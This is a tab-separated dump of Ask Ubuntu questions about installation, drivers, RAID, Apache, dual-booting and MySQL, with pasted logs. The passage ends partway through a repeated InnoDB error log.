341867	how do i install the latest version of ubuntu touch in a lg nexus 4 ?	i installed ubuntu on the touch device lg nexus 4 according to the instructions of the wiki . the first problem was the command in step 4 : phablet-flash ( cdimage-touch | cdimage-legacy | ubuntu-system | community ) -b gave me : ( bash : syntax error near token expected `` cdimage-touch '' ) i got results only when i separate the commands and i fired one at a time : phablet-flash cdimage-touch-b phablet cdimage-flash-legacy-b but while the first left on the android device , the second has installed a version of ubuntu that is not like those visible in several movies on the internet , for example does not have the ability to upgrade the system from the app settings . i tried to update the system from the terminal , but the next time the os crashed and then after a reboot of the system are no longer started ( remained a black screen ) . i restored android and i redid the same procedures but got the same result , the system was unstable and often got stuck . is there any way to flash with the command phablet-flash the latest release of ubuntu touch ? my p.c . has kubuntu operating system
341868	apache2 , serveralias not working	i know it is a question asked several times , but i 've read them all and not solved the problem . i have configured the virtualhost apache like this : sudo nano /etc/apache2/sites-available/example.loc < virtualhost *:80 > servername example.loc serveralias www.example.loc documentroot /var/www/example/web < directory /var/www/example/web > allowoverride all order allow , deny allow from all < /directory > errorlog /var/log/apache2/project_error.log customlog /var/log/apache2/project_access.log combined i put this in the /etc/hosts file : 127.0.0.1 localhost 127.0.0.1 example.loc and then i loaded the site in this way : sudo a2ensite example.loc and restarted apache . if i go to example.loc , it works properly , but if i go to www.example.loc , it does not work , saying that it is `` impossible to find www.example.loc '' ! have i done something wrong in the configuration ?
341876	can i install items on ubuntu , without using the command line ?	everything i 've googled so far has used the command line ?
341877	why ca n't ubuntu see wireless ?	12.04 lts i just instaled ubuntu on my samsung series 3 laptop . when the installation started from the dvd , it was able to easily connect to my wireless network , then during installation it 's disconnected and when it 's finished , wireless just does n't work it can not even see the networks anymore . lists nothing . with cable i still can access internet but no wireless . it 's a laptop so wireless internet is kinda important to have . please advise how to fix this . thank you !
341879	what is the list of tablets able to run with ubuntu-touch ?	in the official ubuntu website i can found : the list of ubuntu desktop certified hardwares the list of ubuntu server certified hardwares but no list of tablets ! in ubuntu web site , i can found that there is the hardware requirement for installing ubuntu-touch . a good start , but a real list would be better , for example searching for anwsers in askubuntu i see that some tablet ( windows ones ) can simply not run with ubuntu `` due to secure keys in order to boot up it '' , so i conclude that hardware requirement is not enough . i found a similar question opened 1 year ago . but the answers to this old question were about installing ubuntu desktop . is there anything new with ubuntu-touch ?
341887	ata failure on a raid5 array	i 've been getting some raid5 failures for some time when under heavy load . i 've always been able to force reassemble the array after a reboot , and the event count between the dropped disks and the non-dropped one is always less than 20 . after some investigation , i think i figured that the issue is n't on the disk themselves ( they usually drop together at the same time ) but on the controller . here 's an extract of the dmesg log when this happens ( in that case , it happened while forcing a check on the array ) : http : //paste.ubuntu.com/6067736/ after it failed like this , both drives /dev/sde and /dev/sdf seem to be inaccessible , as a smartctl -a /dev/sde gives up this : smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.2.0-37-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net vendor : /5:0:0:0 product : user capacity : 600,332,565,813,390,450 bytes [ 600 pb ] logical block size : 774843950 bytes > > terminate command early due to bad response to iec mode page a mandatory smart command failed : exiting . to continue , add one or more '-t permissive ' options . even though a 600pb disk would be nice , it 's just 1.5tb instead . i have 3 of the raid disks that are connected to ata ports on the motherboard , and 2 disks are connected on an external ( pciex ) ata controller . from the failures in the log i have reason to believe it 's the controller that has issues . what could i do to fix this ? change ata cables ? change some settings ? i 'm pretty new to linux . data from smartctl : model family : western digital caviar green ( adv . format ) device model : wdc wd15ears-00mvwb0 serial number : wd-wmaza2091111 lu wwn device id : 5 0014ee 6ab49271f firmware version : 51.0ab51 sdf gives out those stats : smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 171 169 051 pre-fail always - 34595 3 spin_up_time 0x0027 253 253 021 pre-fail always - 1016 4 start_stop_count 0x0032 100 100 000 old_age always - 78 5 reallocated_sector_ct 0x0033 162 162 140 pre-fail always - 735 7 seek_error_rate 0x002e 200 199 000 old_age always - 0 9 power_on_hours 0x0032 070 070 000 old_age always - 22178 10 spin_retry_count 0x0032 100 253 000 old_age always - 0 11 calibration_retry_count 0x0032 100 253 000 old_age always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 76 192 power-off_retract_count 0x0032 200 200 000 old_age always - 43 193 load_cycle_count 0x0032 199 199 000 old_age always - 3415 194 temperature_celsius 0x0022 118 110 000 old_age always - 32 196 reallocated_event_count 0x0032 001 001 000 old_age always - 691 197 current_pending_sector 0x0032 200 200 000 old_age always - 6 198 offline_uncorrectable 0x0030 200 200 000 old_age offline - 2 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 200 multi_zone_error_rate 0x0008 199 189 000 old_age offline - 319 while sde does n't show any reallocations or read errors : smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 200 200 051 pre-fail always - 0 3 spin_up_time 0x0027 253 253 021 pre-fail always - 925 4 start_stop_count 0x0032 100 100 000 old_age always - 73 5 reallocated_sector_ct 0x0033 200 200 140 pre-fail always - 0 7 seek_error_rate 0x002e 200 200 000 old_age always - 0 9 power_on_hours 0x0032 070 070 000 old_age always - 22178 10 spin_retry_count 0x0032 100 253 000 old_age always - 0 11 calibration_retry_count 0x0032 100 253 000 old_age always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 71 192 power-off_retract_count 0x0032 200 200 000 old_age always - 38 193 load_cycle_count 0x0032 199 199 000 old_age always - 3378 194 temperature_celsius 0x0022 114 106 000 old_age always - 36 196 reallocated_event_count 0x0032 200 200 000 old_age always - 0 197 current_pending_sector 0x0032 200 200 000 old_age always - 0 198 offline_uncorrectable 0x0030 200 200 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 200 multi_zone_error_rate 0x0008 200 200 000 old_age offline - 0 disks are indeed green , did n't think it would be a problem when i bought them . what seems strange to me is that under load usually both disks just drop out of the array . could the faulty disk somehow `` cascade '' to the other one on the same ata controller ? in any case i guess i have to buy at least one new drive . edit : funny that i said usually both drives die at the same time ; after checking this morning i just realized only sdf dropped of the array , and it 's been for quite some time as the even count difference is about 4000 . in that case i assume it makes no sense to try to add it back to the array , i need to find a spare one quickly .
341893	what is the best way to upgrade the kernel in 12.04.3 ?	i am using 12.04 lts , which through my update manager is now upgraded to 12.04.3 . however , my linux kernel has not been upgraded ; it 's 3.2.0-52-generic-pae . there is a v.3.8 in the package manager but it has never shown up in the upgrade manager ( in fact , there are several versions of the 3.8 kernel in the pkg mgr ) . what is the best way to upgrade the kernel ? i have read several other threads but could n't clearly find out anything about updating the kernel . i did find this link : how to upgrade ubuntu 12.04.2 to ubuntu 12.04.3 but i have no idea what the *-lts-raring-packages are . if there is a link for the answer to my question , just point me to it . thanks in advance .
341894	installing new os : kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 )	this is ubuntu 13.04 , everything works fine till it comes to main installation menu.. i have already an win7 install in my system which is dell inspiron n5110 . after booting the live dvd it comes to main installation menu and asks for selecting language , after that there are some options like try ubuntu now , install ubuntu , check cd for errors etc but whenever i press enter on any tab it gives me the error kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) .. i am new to this os and totally stuck.. please help
341895	how can i run coin generation app on ubuntu ?	i am trying to run threadmanager.exe with wine on ubuntu . it 's the digital generation program , to earn money with the computer . the program does n't start , and i have this on the terminal : err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . fixme : ole : remunknown_queryinterface no interface for iid { 00000019-0000-0000-c000-000000000046 } fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x328c38,0x00000000 ) , stub ! fixme : win : enumdisplaydevicesw ( ( null ) ,0,0x328c18,0x00000000 ) , stub ! err : d3d : context_create failed to set pixel format 1 on device context 0x340051 . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 1 on device context 0x2f0053 . fixme : d3d : wined3d_get_format ca n't find format wined3dfmt_r24_unorm_x8_typeless ( 0x49 ) in the format lookup table fixme : d3d : getdepthstencilbits unsupported depth/stencil format wined3dfmt_unknown . err : d3d : context_create failed to set pixel format 37 on device context 0x10055 . err : d3d : context_create failed to set pixel format 25 on device context 0x10057 . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 25 on device context 0x10059 . err : d3d : context_create failed to set pixel format 1 on device context 0x1005b . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 1 on device context 0x1005d . fixme : d3d : wined3d_get_format ca n't find format wined3dfmt_r24_unorm_x8_typeless ( 0x49 ) in the format lookup table fixme : d3d : getdepthstencilbits unsupported depth/stencil format wined3dfmt_unknown . err : d3d : context_create failed to set pixel format 37 on device context 0x1005f . err : d3d : context_create failed to set pixel format 25 on device context 0x10061 . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 25 on device context 0x10063 . err : d3d : context_create failed to set pixel format 1 on device context 0x10065 . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 1 on device context 0x10067 . fixme : d3d : wined3d_get_format ca n't find format wined3dfmt_r24_unorm_x8_typeless ( 0x49 ) in the format lookup table fixme : d3d : getdepthstencilbits unsupported depth/stencil format wined3dfmt_unknown . err : d3d : context_create failed to set pixel format 37 on device context 0x10069 . err : d3d : context_create failed to set pixel format 25 on device context 0x1006b . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 25 on device context 0x1006d . err : d3d : context_create failed to set pixel format 1 on device context 0x600075 . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 1 on device context 0x340077 . fixme : d3d : wined3d_get_format ca n't find format wined3dfmt_r24_unorm_x8_typeless ( 0x49 ) in the format lookup table fixme : d3d : getdepthstencilbits unsupported depth/stencil format wined3dfmt_unknown . err : d3d : context_create failed to set pixel format 37 on device context 0x10079 . err : d3d : context_create failed to set pixel format 25 on device context 0x1007b . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 25 on device context 0x1007d . err : d3d : context_create failed to set pixel format 1 on device context 0x1007f . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 1 on device context 0x10081 . fixme : d3d : wined3d_get_format ca n't find format wined3dfmt_r24_unorm_x8_typeless ( 0x49 ) in the format lookup table fixme : d3d : getdepthstencilbits unsupported depth/stencil format wined3dfmt_unknown . err : d3d : context_create failed to set pixel format 37 on device context 0x10083 . err : d3d : context_create failed to set pixel format 25 on device context 0x10085 . err : d3d : context_choose_pixel_format ca n't find a suitable ipixelformat err : d3d : context_create failed to set pixel format 25 on device context 0x10087 . wine : unhandled exception 0x0eedfade in thread 9 at address 0xb1fa8ebc:0x7b83bbd5 ( thread 0009 ) , starting debugger ... err : winediag : xrandr12_init_modes broken nvidia randr detected , falling back to randr 1.0 . please consider using the nouveau driver instead . err : seh : setup_exception_record stack overflow 892 bytes in thread 0009 eip b75ffa27 esp 00230fb4 stack 0x230000-0x231000-0x330000 it 's there a way to run it ?
341899	remove ubuntu from computer	i got a new laptop and i installed ubuntu onto it . before , there was no operating system . is there a way i can remove ubuntu , and get back to having no operating system at all ? ?
341900	why 're two separate panel icons , when opened , grouping under the same icon	i have two separate .desktop files locked to the panel . both of them opens terminal windows and runs a series of commands ( with user input ) . trouble is , while one is opened already , opening the other results in both of them getting grouped together under the same one ( one which was opened first ) . this is a bit troubling since..say if i opened a terminal window by ctrl+alt+t shortcut , instead of opening a new icon in the panel , it gets added in to the already opened .desktop file ! i 'm running ubuntu 12.10 with unity interface .
341907	using intel wireless display ( widi ) in ubuntu	my thinkpad x1 carbon apparently supports intel widi . i believe this should , in theory , allow me to share my screen with my sony bravia tv which supports miracast . is it possible to make use of wireless display in ubuntu to share my display with my tv ? edit : i found a thread on ubuntuforums.com about this very issue . it was started in 2010 but it appears that as of the final post ( january 2013 ) there was still no widi support in ubuntu . as the commenter mentions , windows 7 has had support for a while .
341916	when can i download ubuntu for a tablet ?	when will it be possible to download ubuntu to install on tablet devices ? i 've got a few tablets which i would love to install ubuntu onto . for instance i 've got a kindle which i hate having to go on amazon to download aps . it would be cool if i could install ubuntu on it as then i would have the freedom to do things i want without having the hassle of amazon watching what i download .
341917	how to develop ubuntu apps ( 2013 edition )	i know this question has come up before , but the answers can quickly go out of date . no pun intended . ; ) previously , it was the `` quickly '' tool to build apps . now , developer.ubuntu.com points you to the ubuntu-sdk package . my question is , can i develop desktop apps with this ? it seems to be geared towards mobile touch apps . i want to be able to develop gui apps in python .
341918	the terminalrc in ubuntu	i knew that , if i want to set the cursor sharp in terminal , the setting will be found at edit - > profile preference - > general tab by accident , i saw a configure file , about terminalrc . here are the configuration about cursor sharp : misccursorshape=terminal_cursor_shape_block my investigation : terminalrc file can not be found in ~/.config . even if the folder terminal . there are two files about gnome-terminalrc , but still not any clew about cursor sharp /usr/share/themes/ambiance/gtk-2.0/apps/gnome-terminal.rc /usr/share/themes/radiance/gtk-2.0/apps/gnome-terminal.rc is there anyone can help me ? thanks in advance ! my ubuntu info : $ uname -a linux mj 3.8.0-29-generic # 42-ubuntu smp tue aug 13 23:12:18 utc 2013 i686 i686 i686 gnu/linux $ cat /etc/issue ubuntu 13.04 \n \l $ gnome-terminal -- version gnome terminal 3.6.1 $ gnome-session -- version gnome-session 3.6.2
341922	computer wo n't boot after installing ubuntu 13.04	i 'm running windows 7 home premium 64-bit and i just tried to install ubuntu 13.04 64-bit along side of it . the install was successful , yet when my computer starts , it gets to where i should see grub and instead i just have a blank screen . i 've let it sit for a half hour , tried rebooting , and also tried hitting enter , but nothing works . edit : for more information , i used a burned 13.04 64-bit dvd during startup and chose to install along side of windows . edit2 : booting off of a windows dvd and rebuilding the bcd also had no effect -- same problem after restart .
341925	ubuntu color calibration software error message	i have a weird problem with the color software on ubuntu.i bought a colorhug and when i connect it to my laptop it automatically starts the color software to calibrate my screen.the problem is that everytime i ca n't calibrate my screen because i receive an error message which says : new_disprd ( ) failed with 'windows access failed '
341927	how do i make sure my partition returned to my primary os after uninstalling ubuntu	i tried installing ubuntu ( on a new computer that came with windows 8 ) so i would have a system running unix for my school assignments . i installed it using wubi.exe ( this one : http : //www.ubuntu.com/download/desktop/install-ubuntu-with-windows ) and it did n't work correctly . i have done a little research and know what the problem is and how i should approach fixing it ( i 'm going to try to get it to boot from usb from now on ) , but i need to make sure of one thing first . i removed it by going into c : \ubuntu\ and using the uninstall thing in that folder . when i installed it , i gave it 25gb of my hard drive . what i want to know is , did uninstalling it the way i did return that memory to windows , or do i have to do something else ? i want to make sure i 'm not losing my hard drive as i fiddle around with getting this to work .
341928	make gnome-desktop clock larger	i use xfce with gnome-screensaver . is it possible to change the font size of the date/time in the lock screen ( on the top bar ) without making any changes to font sizes elsewhere ? thank you
341930	driver related opengl graphics problem ( minecraft and steam wont start )	this has been bothering me for about a week now , i have been looking up answers on forums and everything and nothing seems to work . what happens is when i start minecraft i get this stacktrace : org.lwjgl.lwjglexception : could not init glx at org.lwjgl.opengl.linuxdisplaypeerinfo.initdefaultpeerinfo ( native method ) at org.lwjgl.opengl.linuxdisplaypeerinfo. < init > ( linuxdisplaypeerinfo.java:61 ) at org.lwjgl.opengl.linuxdisplay.createpeerinfo ( linuxdisplay.java:788 ) at org.lwjgl.opengl.drawablegl.setpixelformat ( drawablegl.java:61 ) at org.lwjgl.opengl.display.create ( display.java:846 ) at org.lwjgl.opengl.display.create ( display.java:757 ) at org.lwjgl.opengl.display.create ( display.java:739 ) at avx.q ( sourcefile:303 ) at avx.e ( sourcefile:622 ) at net.minecraft.client.main.main.main ( sourcefile:103 ) this is n't a bug in minecraft , before i was able to run minecraft perfectly fine . what i think happened is that i tried to update my ubuntu and got a graphics warning so i thought maybe i should n't and cancelled part way into updating , ever since i keep getting this error and nothing i have tried has worked . i have tried updating drivers , installing vaapi . and bumblebee just stopped my ubuntu from launching . i must have gone through hundreds of answers and threads . when i run glxinfo i get this output : name of display : :0.0 xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . error : could n't find rgb glx visual or fbconfig xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . xlib : extension `` glx '' missing on display `` :0.0 '' . this may seem like a duplicate but nothing i have found has worked and im really stuck . my graphics card : intel hd graphics 3000 and my processor is an intel i3 . and yes i do have oracle java . help is very much appreciated . edit : fixed o.o bumblebee decided to work this time ... odd before it made my laptop unbootable .
341936	installing ubuntu 13.04 onto a computer that already has windows 7 pro installed	system : asus p8h67-m pro motherboard with latest bios update ( ami 3904 , 4/27/2013 ) ; intel core i7-3770 cpu ; western digital wd1001fals-40u9b0 1 tb sata fixed disk , where all windows 7 related software resides ; this hard drive has a 100 mb efi system partition , a 128 mb microsoft reserved ( msr ) partition , and a 931.29 gb ntfs partition ; western digital wd10ezex-00ud2a0 1 tb sata fixed disk with 931.51 gb of unallocated space ; auria eq 2668 26 '' lcd monitor . history : downloaded ubuntu-13.04-destop-amd64.iso file and burned an iso dvd . tried to install from iso dvd , but the installation program could not detect any existing operating system . downloaded parted magic ( per ubuntu web site recommendation ) and booted it to run the following : gdisk /dev/sdb ( wd1001fals ) , p ( indicated everything was ok ) , x ( expert command ) , n ( to generate new protective mbr ) , w ( to save changes ) . this procedure had no effect on the ubuntu 13.04 install process , which could still not detect windows 7 . per another ubuntu web site recommendation , i created a 200 mb efi system partition on the second hard drive ( wd10ezex , intended location for all linux software ) . after i booted up the ubuntu 13.04 installation cd and selected ubuntu installation from the command line menu , the monitor screen went blank - no graphic display , no display of any kind . i turned off the computer manually by holding down the on-off button . the computer could reboot into windows 7 . i tried booting into parted magic and again got a blank screen . i used diskpart under the windows 7 command line to perform a clean command on wd10ezex and eliminate its efi partition . i could again boot into parted magic and into the 13.04 installation disk and get displays . per a rod smith web article on `` legacy bios issues with gpt '' , i executed the following : gdisk /dev/sdb/ , x , h ( to recompute chs values in the protective mbr ) , w ( to save changes and exit ) . i again tried to install ubuntu 13.04 and got the same message at the installation type window : this computer currently has no detected operating systems . what would you like to do ? if i select `` something else '' i get a window showing that sda ( wd10ezex ) has no partitions and sdb ( wd1001fals ) has an sdb1 efi partition , an sdb2 unknown ( i assume this is the msr partition ) , and an sdb3 ntfs partition . question : can i create / , /swap , and /home partitions onto sda , go ahead with the installation , and be able to boot into either windows 7 or ubuntu 13.04 ? i am willing to switch from disk-to-disk in the in the bios initialization process when i turn the computer on .
341937	when starting gparted `` gtk-warning ** : can not open display : ''	this is exactly my problem . running ubuntu server 12.04. sorry i could n't find a way to mark the thread `` unanswered '' . resize a 2tb partition on a 3tb disk created with fdisk i downloaded and installed gparted - however i get an errors when trying to run it . can you guys help me ? my terminal output is below : keysersoze @ the-usual-suspects : / $ sudo gparted /dev/sda ( gpartedbin:18064 ) : gtk-warning ** : can not open display : keysersoze @ the-usual-suspects : / $ note that i am fairly new to linux . thanks for your patience .
341939	why cant i create a directory in /sys	i 'm learning ubuntu and experimenting with things . i noticed i couldnt create a directory within /sys is this a special directory or something ? are there other types of directories ? ( i did a sudo -i and a chmod a+w /sys )
341940	how to configure a second monitor using displaylink on ubuntu 13.04	after following the advice in this question , the second monitor is detected , and the mirroring option works ( although not that smoothly ) . however , i 'm not able to activate the second monitor in the display settings . i got an error that says failed to apply configuration : % s . i have no idea how to debug this . any points or work around to fix this ?
341943	how to uninstal mysql 5.6 and reinstall 5.5	i followed this ( rtcamp.com/wordpress-nginx/tutorials/mysql/mysql-5-6-ubuntu-12-04/ ) to try to upgrade from 5.5 to 5.6 . but i could not change the root password . i want to install 5.5 again . so i did sudo apt-get install mysql-server selecting previously unselected package mysql-server-5.5 . unpacking mysql-server-5.5 ( from ... /mysql-server-5.5_5.5.32-0ubuntu0.12.04.1_amd64.deb ) ... selecting previously unselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.5.32-0ubuntu0.12.04.1_all.deb ) ... processing triggers for man-db ... processing triggers for ureadahead ... setting up mysql-server-core-5.5 ( 5.5.32-0ubuntu0.12.04.1 ) ... setting up mysql-server-5.5 ( 5.5.32-0ubuntu0.12.04.1 ) ... 130905 11:48:37 [ note ] plugin 'federated ' is disabled . 130905 11:48:37 innodb : the innodb memory heap is disabled 130905 11:48:37 innodb : mutexes and rw_locks use gcc atomic builtins 130905 11:48:37 innodb : compressed tables use zlib 1.2.3.4 130905 11:48:37 innodb : initializing buffer pool , size = 128.0m 130905 11:48:37 innodb : completed initialization of buffer pool innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . 130905 11:48:37 innodb : retrying to lock the first data file innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another 